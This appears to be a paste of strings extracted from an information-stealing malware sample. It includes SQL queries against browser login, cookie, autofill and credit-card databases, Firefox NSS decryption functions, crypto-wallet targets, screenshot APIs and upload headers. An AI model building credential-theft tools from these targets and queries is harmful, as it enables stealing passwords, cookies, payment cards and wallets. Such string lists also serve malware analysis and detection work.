

Mar 14th, 2023
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text 2.41 KB | None | 0 0
  1. sgnl_
  2. tlgrm_
  3. ews_
  4. grbr_
  5. dscrd_
  6. %s\tTRUE\t%s\t%s\t%s\t%s\t%s\n
  7. URL:%s\nUSR:%s\nPASS:%s\n
  8. \t\t%d) %s\n" tabtabd
  9. \tLocale: %s\n
  10. \tOS: %s\n
  11. \tRAM: %d MB\n
  12. \tTime zone: %c%ld minutes from GMT\n
  13. \tDisplay size: %dx%d\n
  14. %d
  15. \tArchitecture: x%d\n
  16. \tCPU: %s (%d cores)\n
  17. \tDisplay Devices:\n%s\n
  18. formhistory.sqlite
  19. *
  20. \
  21. \n
  22. \r
  23. :
  24. %
  25. ;
  26. _
  27. |"
  28. \*
  29. logins.json
  30. \\autofill.txt
  31. \\cookies.txt
  32. \\passwords.txt
  33. ---
  34. --
  35. */*
  36. Content-Type: application/x-www-form-urlencoded; charset=utf-8
  37. Content-Type: multipart/form-data; boundary=
  38. Content-Type: text/plain;
  39. User Data
  40. wallets
  41. wlts_
  42. ldr_
  43. scrnsht_
  44. sstmnfo_
  45. token:
  46. nss3.dll
  47. sqlite3.dll
  48. SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion
  49. PATH
  50. Product Name
  51. Web Data
  52. Login Data
  53. sqlite3_prepare_v2
  54. sqlite3_open16
  55. sqlite3_close
  56. sqlite3_step
  57. sqlite3_finalize
  58. sqlite3_column_text16
  59. sqlite_column_bytes16
  60. sqlite_column_blob
  61. SELECT origin_url, username_value, password_value FROM logins
  62. SELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies
  63. SELECT name, value FROM autofill
  64. pera
  65. Stable
  66. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  67. SELECT fieldname, value FROM moz_formhistory
  68. cookies.sqlite
  69. machineId=
  70. &configId=
  71. \"encrypted_key\":\
  72. stats_version\":\"
  73. Content-Type: application/x-object
  74. Content-Disposition: form-data; name=\"file\"; filename=\"
  75. GET
  76. POST
  77. Low
  78. MachineGuid
  79. image/jpeg
  80. gdiplus.dll
  81. gdi32.dll
  82. GdiplusStartup
  83. GdiDisposeImage
  84. GdiGetImageEncoders
  85. GdiGetImageEncodersSize
  86. GdiCreateBitmapFromHBITMAP
  87. GdipSaveImageToFile
  88. BitBlt
  89. CreateCompatibleBitmap
  90. CreateCompatibleDC
  91. DeleteObject
  92. GetObjectW
  93. SelectObject
  94. SetStretchBltMode
  95. StretchBlt
  96. SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards
  97. Cookies
  98. Network\\Cookies
  99. NUM:%s\nHOLDER:%s\nEXP:%s/%s\n
  100. \\CC.txt
  101. NSS_Init
  102. NSS_Shutdown
  103. PK11_GetInternalKeySlot
  104. PK11_FreeSlot
  105. PK11_Authenticate
  106. PK11SDR_Decrypt
  107. SECITEM_FreeItem
  108. hostname\":\"
  109. \",\"httpRealm\":
  110. encryptedUsername\":\"
  111. \",\"encryptedPassword\":\"
  112. \",\"guid\":
  113. Profiles
  114. ://
  115. ru"
  116. S-1-5-18
  117. v10
  118. /
  119. Default
  120. Profile %d
  121. extensions
  122. xtntns_
  123. prefs.js
  124. storage\\default
  125. ff
  126. MetaMask
  127. .sqlite
  128. \\\"\\\":\\\"
  129. TRUE
  130. FALSE
  131. 0x31
  132. explorer.exe
  133. SOFTWARE\\Microsoft\\Cryptography
  134. SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall
  135. DisplayName
  136. DisplayVersion
  137. \t%s %s\n
  138. \\ffcookies.txt
  139. ?
  140. Local State
  141. ..
  142. .
  143. wallet.dat
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